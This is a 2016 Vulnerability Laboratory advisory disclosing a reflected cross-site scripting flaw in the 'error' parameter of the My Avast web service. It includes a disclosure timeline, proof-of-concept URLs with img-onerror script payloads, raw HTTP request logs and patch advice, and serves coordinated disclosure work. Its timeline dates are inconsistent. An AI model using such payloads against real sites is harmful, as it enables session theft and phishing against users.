Document Title:
===============
AVAST (My) #15 - (frontend.exception) CS XSS Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1625
Release Date:
=============
2016-04-18
Vulnerability Laboratory ID (VL-ID):
====================================
1625
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST
Software s.r.o., a Czech private limited company. Avast was founded in 1988, and is headquartered in Prague, Czech Republic.
It produces antivirus and security programs for personal and commercial use. In January 2015, Avast had 21.4% of the worldwide
security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software
products have a user interface available in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic.
Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side vulnerability in the Avast Business online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-10-27: Researcher Notification & Coordination (Kieran Claessens)
2015-10-27: Vendor Notification (AVAST Security Team)
2015-11-02: Vendor Response/Feedback (AVAST Security Team)
2015-04-12: Vendor Fix/Patch (AVAST Developer Team)
2015-04-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
AVAST!
Product: My.Avast - Online Service (Web-Application) 2015 Q4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official Avast My online service web-application.
The client-side vulnerability allows remote attacker to inject script codes to compromise client-side browser to application requests.
The vulnerability is located in the `error` value of the frontend.exception in the my avast online-service web-application. Remote attackers are
able to inject script code to manipulate client-side GET methods request to the my.avast.com website. The injetction point is the error value of the
exception and the execution of the injected script code occurs in the error message context. The attack vector of the vulnerability is client-side and
the request method to inject or execute is GET.
The security risk of the client-side cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the client-side cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of
malicous script codes or client-side manipulation of affected or connected modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Avast - My
Vulnerable Parameter(s):
[+] error
Affected Module(s):
[+] frontend.exception - Exception Handling (Registration)
Proof of Concept (PoC):
=======================
The client-side cross site vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Links
https://my.avast.com/en-us/error?error=registration_already_finished"><img src="X" onerror="alert('xss')>"
https://my.avast.com/en-us/error?error="><img src="X" onerror="alert('xss')>" //this gives a more detailed error.
PoC: Source
<h1>frontend.exception.header.registration_already_finished"><img src="X" onerror="alert('xss')>" <="" h1="">
<p>frontend.exception.desc.registration_already_finished"><img src="X" onerror="alert('xss')>" <="" p="">
<a href="/en-us/" class="button button-inline button-huge button-secondary margin-top-20">Go to My Avast homepage.</a>
</p></h1>
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22[CLIENT-SIDE SCRIPT CODE INJECT!]
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] GrΓΆΓe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[my.avast.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Cookie[app_params=error%3Dregistration_already_finished%2522%253E%253Cimg%2520src%3D%2522X%2522%2520onerror%3D%2522alert%28document.cookie%29%253E%2522;
locale2=en-ww; _ga=GA1.2.1239098146.1445943331; mySessionId=bl5aNojSS9O8NHKd]
Connection[keep-alive]
If-Modified-Since[Fri, 23 Oct 2015 10:52:20 GMT]
Response Header:
Server[nginx/1.7.6]
Date[Tue, 27 Oct 2015 11:32:30 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Set-Cookie[locale2=en-us; Expires=Sun, 14 Nov 2083 14:46:37 GMT; Path=/; Domain=.avast.com; Secure; HTTPOnly
mySessionId=bl5aNojSS9O8NHKd; Expires=Tue, 27 Oct 2015 11:33:30 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly]
Last-Modified[Fri, 23 Oct 2015 10:52:20 GMT]
Cache-Control[max-age=0, private]
Strict-Transport-Security[max-age=31536000]
x-content-type-options[nosniff]
X-XSS-Protection[1; mode=block]
Content-Encoding[gzip]
Status: 200[OK]
GET https://my.avast.com/en-us/X[CLIENT-SIDE SCRIPT CODE VULNERABILITY!]
Load Flags[LOAD_NORMAL] GrΓΆΓe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[my.avast.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://my.avast.com/en-us/error?error=registration_already_finished%22%3E%3Cimg%20src=%22X%22%20onerror=%22alert(document.cookie)%3E%22]
Cookie[app_params=error%3Dregistration_already_finished%2522%253E%253Cimg%2520src%3D%2522X%2522%2520onerror%3D%2522alert%28document.cookie%29%253E%2522;
locale2=en-us; _ga=GA1.2.1239098146.1445943331; mySessionId=bl5aNojSS9O8NHKd]
Connection[keep-alive]
Response Header:
Server[nginx/1.7.6]
Date[Tue, 27 Oct 2015 11:32:30 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Set-Cookie[mySessionId=bl5aNojSS9O8NHKd; Expires=Tue, 27 Oct 2015 11:33:30 GMT; Path=/; Domain=.my.avast.com; Secure; HTTPOnly]
Last-Modified[Fri, 23 Oct 2015 10:52:20 GMT]
Cache-Control[max-age=0, private]
Strict-Transport-Security[max-age=31536000]
x-content-type-options[nosniff]
X-XSS-Protection[1; mode=block]
Content-Encoding[gzip]
Reference(s):
https://my.avast.com/
https://my.avast.com/en-us/
https://my.avast.com/en-us/error
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable error value in the frontend.exception module.
Restrict the input and disallow special chars to prevent client-side script code injection attacks. Sanitize the output section with the wrong set
encoding to prevent an execution of malicious client-side script codes.
2015-04-12: Vendor Fix/Patch (AVAST Developer Team)
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the my.avast web-application is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or [email protected]) to get a ask permission.
Copyright Β© 2016 | Vulnerability Laboratory - [Evolution Security GmbH]β’